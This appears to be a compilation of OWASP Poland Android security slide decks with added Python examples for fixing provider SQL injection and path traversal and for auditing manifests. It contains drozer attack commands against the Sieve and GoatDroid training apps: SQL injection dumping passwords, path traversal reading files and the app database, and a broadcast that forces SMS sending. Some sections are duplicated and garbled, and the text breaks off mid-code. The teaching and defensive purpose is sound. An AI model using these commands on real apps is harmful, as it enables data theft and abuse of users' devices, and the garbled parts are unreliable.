Example: using content providers, any app can read SMS from the built-in SMS app's repository on our device
• What info can they hold?
  – User's phone numbers
  – Passwords
  – SMS
• And one of the main problems is, again, permissions:
  run app.provider.info --permission null
Content providers attacks
• Unrestricted access to the app database
  – Just query it:
    run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on auth might include altering data, e.g. by using the app.provider.insert command
  dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
• Unrestricted access to the app database
  dz> run scanner.provider.finduris -a com.mwr.example.sieve
  Accessible content URIs:
    content://com.mwr.example.sieve.DBContentProvider/Keys
    content://com.mwr.example.sieve.DBContentProvider/Passwords
    content://com.mwr.example.sieve.DBContentProvider/Passwords/
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --vertical
Content providers attacks
bull SQL injection
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --selection "'"
  unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --projection "* FROM Key--"
  | Password         | pin  |
  | thisismypassword | 9876 |
Content providers attacks
bull Path traversal
One interesting real-life example: httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
  dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
  127.0.0.1 localhost
  dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
  Written 24576 bytes
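How the two provider holes shown in the SQL injection and path traversal slides above can be closed, as an added example modelled in Python with sqlite3 (not Sieve's or drozer's own code). The table names, sample rows, and backup directory are constructed; the vulnerable functions reproduce the behaviour seen in the drozer output, the hardened ones are the fix.

```python
"""query() with caller-controlled projection/selection, and openFile() with a
caller-controlled path: the vulnerable shape next to a hardened one."""
import os
import sqlite3

ALLOWED_COLUMNS = ("_id", "service", "username")        # 'password' is deliberately not exposed
BACKUP_DIR = "/data/data/com.mwr.example.sieve/files"   # assumed root of the backup provider


def build_db():
    """Constructed stand-in for the app database: a Passwords table plus the Key
    table that the '* FROM Key--' projection pulled out of the provider."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT,
                                username TEXT, password TEXT);
        CREATE TABLE Key (Password TEXT, pin INTEGER);
        INSERT INTO Passwords (service, username, password)
            VALUES ('Mail', 'alice', 'hunter2');
        INSERT INTO Key VALUES ('thisismypassword', 9876);
    """)
    return conn


def vulnerable_query(conn, projection=None, selection=None):
    """Splices projection and selection straight into the SQL text, which is what
    produced "SELECT * FROM Passwords WHERE (')" in the drozer output above."""
    cols = ", ".join(projection) if projection else "*"
    sql = "SELECT %s FROM Passwords WHERE (%s)" % (cols, selection or "1")
    return conn.execute(sql).fetchall()


def hardened_query(conn, projection=None, filters=None):
    """The projection is checked against an allow-list and every filter value is
    bound as a parameter, so neither can change the shape of the statement."""
    cols = list(projection) if projection else list(ALLOWED_COLUMNS)
    rejected = [c for c in cols if c not in ALLOWED_COLUMNS]
    if rejected:
        raise ValueError("projection not allowed: %r" % rejected)
    where, args = [], []
    for col, value in (filters or {}).items():
        if col not in ALLOWED_COLUMNS:
            raise ValueError("filter column not allowed: %r" % col)
        where.append("%s = ?" % col)
        args.append(value)
    sql = "SELECT %s FROM Passwords" % ", ".join(cols)
    if where:
        sql += " WHERE " + " AND ".join(where)
    return conn.execute(sql, args).fetchall()


def vulnerable_file_path(requested):
    """os.path.join drops the base when `requested` is absolute, and '..' segments
    walk out of it: the FileBackupProvider behaviour shown with /etc/hosts."""
    return os.path.normpath(os.path.join(BACKUP_DIR, requested))


def hardened_file_path(requested):
    """Only a path that still resolves to a location inside BACKUP_DIR is returned."""
    if os.path.isabs(requested):
        raise PermissionError("absolute path rejected: %r" % requested)
    base = os.path.realpath(BACKUP_DIR)
    candidate = os.path.realpath(os.path.join(base, requested))
    if candidate != base and not candidate.startswith(base + os.sep):
        raise PermissionError("path escapes backup directory: %r" % requested)
    return candidate
```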
Content providers demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low, boot completed, headset plugged in, etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send an intent and enjoy
Broadcast receivers attacks
  <receiver android:name="broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
      <intent-filter>
          <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
      </intent-filter>
  </receiver>
  …
  <uses-permission android:name="android.permission.SEND_SMS" />
Sample manifest from GoatDroid
Broadcast receivers attacks
  public void onReceive(Context arg0, Intent arg1) {
      context = arg0;
      SmsManager sms = SmsManager.getDefault();
      Bundle bundle = arg1.getExtras();
      // extras are taken from the incoming broadcast without any check of the sender
      sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
      Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
  }
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action
Broadcast receivers attacks
  run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all above-mentioned items:
• Setting the android:exported attribute to false (only code running under the same user ID as the current app will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
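A manifest check for the two defenses above: it flags every component that other apps can reach without any permission, which is the situation the GoatDroid receiver is in. Added example, not GoatDroid's or drozer's tooling; the sample manifest is constructed after the slide's snippet, and treating a <provider> without android:exported as exported follows the pre-API-17 default (an assumption, marked in the code).

```python
"""Flag AndroidManifest.xml components reachable by other apps with no permission."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

# Constructed sample: a receiver with an intent-filter but no explicit
# android:exported, an exported activity guarded by a permission, and a
# provider that is explicitly private.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="org.owasp.goatdroid.fourgoats">
  <uses-permission android:name="android.permission.SEND_SMS" />
  <application>
    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver"
              android:label="Send SMS">
      <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
      </intent-filter>
    </receiver>
    <activity android:name=".activities.AdminHome"
              android:exported="true"
              android:permission="org.owasp.goatdroid.fourgoats.permission.ADMIN" />
    <provider android:name=".db.PrivateProvider"
              android:authorities="org.owasp.goatdroid.fourgoats.private"
              android:exported="false" />
  </application>
</manifest>
"""


def android_attr(element, name):
    """Read an attribute from the android: namespace (ElementTree keys them by URI)."""
    return element.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(component):
    """Apply the platform default: an explicit android:exported wins; otherwise an
    activity/service/receiver is exported iff it declares an intent-filter, and a
    provider is treated as exported (assumption: the pre-API-17 default)."""
    explicit = android_attr(component, "exported")
    if explicit is not None:
        return explicit.strip().lower() == "true"
    if component.tag == "provider":
        return True
    return component.find("intent-filter") is not None


def audit_manifest(manifest_xml):
    """Return one record per component with its effective exposure."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    findings = []
    for component in root.iter():
        if component.tag not in COMPONENT_TAGS:
            continue
        name = android_attr(component, "name") or "<unnamed>"
        if name.startswith("."):          # shorthand relative to the package name
            name = package + name
        exported = is_exported(component)
        permission = android_attr(component, "permission")
        findings.append({
            "component": name,
            "kind": component.tag,
            "exported": exported,
            "permission": permission,
            # reachable by any third-party app with no permission check at all
            "unprotected": exported and permission is None,
        })
    return findings


def unprotected_components(manifest_xml):
    """Names of components that need android:exported="false" or a permission."""
    return [f["component"] for f in audit_manifest(manifest_xml) if f["unprotected"]]


if __name__ == "__main__":
    for f in audit_manifest(SAMPLE_MANIFEST):
        status = "UNPROTECTED" if f["unprotected"] else "ok"
        print("%-11s %-8s %s (exported=%s, permission=%s)"
              % (status, f["kind"], f["component"], f["exported"], f["permission"]))
```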
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection – real example
• UniversalMDMClient (a built-in application of Samsung KNOX – a security feature that separates personal and professional activities)
• A crafted URI with the "smdm://" prefix allows remote installation of ANY application, while the user thinks he is installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid Intent filters where you can. Even if your Activity has the attribute exported="false", another application can declare the same filter; when your app sends that implicit Intent the system shows a chooser dialog, and the user may pick the malicious app
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
– Verify if a session expires (copy a cookie and try to use it after 30 minutes)
– Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
– Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should they REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set a session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
Thank you
pawel.rzepa@outlook.com
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
– APKOptic
– Astro File Manager
• Using ADB
• Use APKPure
Decompiling || Disassembling
• Decompiling – high level – Java code
• Disassembling – low level – assembly (Smali) code
• Why disassembling and not decompiling?
Decompiling
DEX → JAR → JAVA
Decompiling - dex2jar
• dex2jar
– Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
– Lets you use any existing Java decompiler on the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool
– Open-source Java tool for reverse engineering Android apps
– Transforms binary Dalvik bytecode (DEX) into Smali source
Signing apk
• Using signapk.jar:
java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: decompiling with Luyten
Demo: modifying Smali files
Demo
Android Application Security
Often the app contains some sensitive data:
• Passwords
• Authentication tokens
• Contacts
• Communication records
• IP addresses or domain names of sensitive services
Android Application Security
Global problems in securing the applications:
• How sensitive data is stored
– Isolation
– Privilege separation
• How sensitive data is transmitted
– Extra-device communication
– Inter-application communication
– Inter-component communication
Android Application Components
Activities, Services, Content providers, Broadcast receivers
Android Application Components
AndroidManifest.xml defines the way the app works and what kind of interaction between its components and the outside world is possible. Permissions are set there too.
• Activities – <activity>
• Services – <service>
• Content providers – <provider>
• Broadcast receivers – <receiver>
Android Manifest
Sample manifest file. Note the following:
• Permissions
<uses-permission android:name="string" />
<permission android:protectionLevel="…" />
• Components and their attributes
AndroidManifest.xml
Android Manifest
Protection levels:
• dangerous – increased risk (directly affects users)
• normal – minimal risk (default value)
• signature – same certificate
• signatureOrSystem – same certificate || app in the Android system image
Android Manifest
• debuggable
• enabled
• exported
• permission
Activities, Services, Content providers, Broadcast receivers – example component attributes
Intents
An Intent is a messaging object that is created and delivered to an intended application component. It includes all the relevant information about the calling application, the desired application component and the requested action/data.
Intent intent = new Intent(Intent.ACTION_VIEW);
intent.setData(Uri.parse("http://www.google.com"));
String pack = "com.android.browser";
ComponentName comp = new ComponentName(pack, pack + ".BrowserActivity");
intent.setComponent(comp);
startActivity(intent);
Drozer
Open-source tool to interact with other applications through IPC – the leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer: you don't need to write your own apps to interact with other apps :)
dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
Drozer is installed in the default package of AppUse together with adb, so it's just "click-and-play"
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: the login screen of your Facebook app
Activities
Activity components attacks
• If an activity can be triggered by other apps (by an attacker), it can be abused
• By launching it with Intents it's possible to achieve the following:
– Modify data in the background
– Trick the user
– Leak sensitive information
Activity components attacks
• General hijacking scheme
• Results of an attack:
– A malicious Activity could read the data in the Intent and then immediately relay it to the legitimate one
– Spoofing the expected Activity's user interface to steal user-supplied data (phishing)
Activity components attacks
• List and launch exported activities:
dz> run app.activity.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
  com.mwr.example.sieve.FileSelectActivity
  com.mwr.example.sieve.MainLoginActivity
  com.mwr.example.sieve.PWList
dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file
Services attacks
Although services generally don't seem dangerous, they could potentially perform sensitive operations.
To attack a service you need an interaction point (it must be exported, or accept input from message formats like Intents, files or the network stack).
Services attacks
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one by one with logcat running to check for sensitive info
• Fire off Intents and wait for the result
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app holding the READ_SMS permission can read SMS from the built-in SMS app's repository on the device
Content providers
• What info can they hold?
– User's phone numbers
– Passwords
– SMS
• And one of the main problems is, again, permissions:
dz> run app.provider.info --permission null
Content providers attacks
• Unrestricted access to the app database
– Just query it:
dz> run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on auth might include altering data, e.g. by using the app.provider.insert command
dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
• Unrestricted access to the app database
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Accessible content URIs:
  content://com.mwr.example.sieve.DBContentProvider/Keys/
  content://com.mwr.example.sieve.DBContentProvider/Passwords
  content://com.mwr.example.sieve.DBContentProvider/Passwords/
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers attacks
• SQL injection
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
| Password         | pin  |
| thisismypassword | 9876 |
Content providers attacks
• Path traversal
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
Written 24576 bytes
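The FileBackupProvider reads above work because the provider opens whatever path the content URI carries. The block below is an added example for this page, not Sieve's or Shazam's code: a Python model of that openFile() next to the canonicalise-then-check fix. The directory tree it reads is constructed in a temp dir (an "app" directory standing in for /data/data/<pkg> and an "outside" file standing in for /etc/hosts), so nothing touches the real filesystem layout.

```python
import os
import tempfile


def build_sample_tree() -> str:
    """Constructed layout: <tmp>/app plays /data/data/<pkg>, <tmp>/outside holds
    a file the provider must never hand out. Returns the app directory."""
    root = tempfile.mkdtemp(prefix="traversal_")
    app = os.path.join(root, "app")
    os.makedirs(os.path.join(app, "databases"))
    with open(os.path.join(app, "databases", "database.db"), "wb") as fh:
        fh.write(b"SQLite format 3\x00")
    os.makedirs(os.path.join(root, "outside"))
    with open(os.path.join(root, "outside", "secret.txt"), "wb") as fh:
        fh.write(b"127.0.0.1 localhost\n")
    return app


def vulnerable_read(base_dir: str, uri_path: str) -> bytes:
    """What a FileBackupProvider-style openFile() effectively does: it trusts
    the path taken from the content URI, so '..' segments walk out of base_dir."""
    with open(os.path.join(base_dir, uri_path), "rb") as fh:
        return fh.read()


def safe_read(base_dir: str, uri_path: str) -> bytes:
    """Canonicalise first (symlinks and '..' included), then refuse anything
    that does not resolve inside base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, uri_path.lstrip("/")))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("refusing %r: resolves outside %s" % (uri_path, base))
    with open(target, "rb") as fh:
        return fh.read()


if __name__ == "__main__":
    app = build_sample_tree()
    print(vulnerable_read(app, "../outside/secret.txt"))
    try:
        safe_read(app, "../outside/secret.txt")
    except PermissionError as exc:
        print(exc)
```

The Java equivalent is File.getCanonicalPath() on both the base directory and the requested file and a startsWith() check on the results; comparing the un-canonicalised strings is not enough, which is the mistake the Shazam write-up above describes.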
Content providers demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements, such as Battery Low, boot completed, headset plugged in, etc. Though most broadcasts originate from the system, applications can also send broadcasts.
Broadcast receivers
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send the Intent and enjoy
Broadcast receivers attacks
<receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
</receiver>
…
<uses-permission android:name="android.permission.SEND_SMS" />
Sample manifest from GoatDroid
Broadcast receivers attacks
public void onReceive(Context arg0, Intent arg1) {
    context = arg0;
    SmsManager sms = SmsManager.getDefault();
    Bundle bundle = arg1.getExtras();
    // sends whatever phoneNumber/message the (unauthenticated) sender supplied
    sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
    Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
}
This is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action.
Broadcast receivers attacks
dz> run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all of the above-mentioned items:
• Setting the android:exported attribute to false (only components running under the same user ID as the current app will be able to reach the component)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
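The two defenses above, the M7 "how to find" commands (app.package.manifest, app.activity.info, app.service.info --permission null) and the GoatDroid receiver are all questions about one file, so the block below answers them from AndroidManifest.xml directly. It is an added example written for this page, not Drozer's, GoatDroid's or Sieve's code; the manifest it parses is constructed, the component names in it are invented, the minSdk handling for providers is simplified to the minSdkVersion rule, and the function names are mine. It applies the platform default rules: a component with an <intent-filter> is exported unless android:exported says otherwise, a provider is exported by default below API 17, and anything exported without android:permission is reachable by every installed app.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List, Optional, Tuple

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def android_attr(name: str) -> str:
    """ElementTree spelling of an android:* attribute."""
    return "{%s}%s" % (ANDROID_NS, name)


# Constructed manifest (not from any real app). It mixes the cases from the
# slides: implicit export via <intent-filter>, explicit android:exported, a
# permission-protected service, an unprotected receiver in the style of
# GoatDroid's SendSMSNowReceiver, and a provider with no protection at all.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.target">
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <permission android:name="com.example.target.INTERNAL" android:protectionLevel="signature"/>
  <application android:debuggable="true">
    <activity android:name=".MainLoginActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".PWList" android:exported="true"/>
    <activity android:name=".SettingsActivity" android:exported="false">
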